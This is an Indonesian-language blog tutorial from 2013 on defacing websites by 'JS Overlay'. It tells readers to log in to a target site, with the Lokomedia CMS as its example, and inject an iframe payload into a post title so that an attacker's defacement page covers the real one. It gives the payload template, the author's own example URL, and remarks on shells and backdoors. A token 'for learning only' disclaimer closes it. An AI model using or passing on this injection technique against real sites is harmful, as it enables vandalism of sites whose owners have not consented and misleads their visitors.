PPC Iklan Blogger Indonesia

Kamis, 30 Mei 2013

2 Tutorial Deface Dengan JS Overlay (mudah kok )

Date: Kamis, 30 Mei 2013 09.54
Category: - -
Author: Unknown
Share:
Responds: 2 Comment
Kali ini saya akan share teknik deface yang "jarang" digunakan karena ini mungkin menjadi alternatif terakhir jika kita gagal memasang shell pada web target. Ada kalanya sebuah web tidak support file php [kalo ini masih bisa di tamper], atau Web tersebut tidak menyediakan fasilitas upload.

Lalu bagaimana solusinya agar kita bisa men-deface web tersebut ? Dengan JS Overlay. Sistem kerjanya berbeda dengan teknik deface yang didahului dengan mengupload shell. Jika shell diupload, maka biasanya script asli yang diganti. Namun untuk JS Overlay, halaman asli web tersebut "ditimpa" oleh halaman deface yang kita buat. Jadi halaman asli tersebut tetap ada namun ditutup oleh script deface kita. Caranya ?

Sebelumnya kalian membutuhkan script deface yang sudah tertanam di web lain. Jika sebelumnya belum pernah melakukan deface, kalian bisa membuat web/blog sendiri, dideface sendiri hanya sebagai "umpan" dari JS Overlay.

Sebagai contoh, target kita kali ini adalah Lokomedia. Seharusnya bisa upload shell. namun sudah saya coba berkali-kali tidak bisa. Mungkin sudah diantisipasi oleh Webmasternya. Makanya saya coba menggunakan metode JS Overlay.

Oke, kita mulai tutorialnya :
Login ke web target. Buat post baru/kalian bisa mengedit judul/nama dari web tersebut.

Masukkan script ini di bagian judul :
<center><iframe src='[situs yang pernah dideface]' height='820px' width='1100px' scrolling='no' frameborder='0'></center>
Untuk tulisan berwarna merah silahkan diganti dengan url kalian sendiri. Intinya kita memanggil script dari url tersebut untuk menutupi halaman yang akan kita deface.
Untuk contoh, ini script saya :
<center><iframe src='http://personal-jsoverlay.blogspot.com/' height='820px' width='1100px' scrolling='no' frameborder='0'></center>


Lalu klik save.
Done. Kita lihat..


Teknik ini [sepertinya] bisa digunakan di semua CMS. Entah itu Lokomedia, Joomla, WP, dll.
Kekurangan dari teknik ini adalah kita hanya punya sekali akses ke web korban karena kita tidak bisa menanam backdoor.

Tutorial ini hanya sebagai pembelajaran. Gunakan sebaik-baiknya.




Artikel Terkait :



Category : - -

2 comments

Unknown (Admin)
25 September 2016 pukul 04.25

Ikut belajar boleh ya,.

Posting Komentar

Langganan: Posting Komentar (Atom)
 
© Copyright 2013Coretan Raka Paksi | Template By : Raka paksi Edited Penjaga Warnet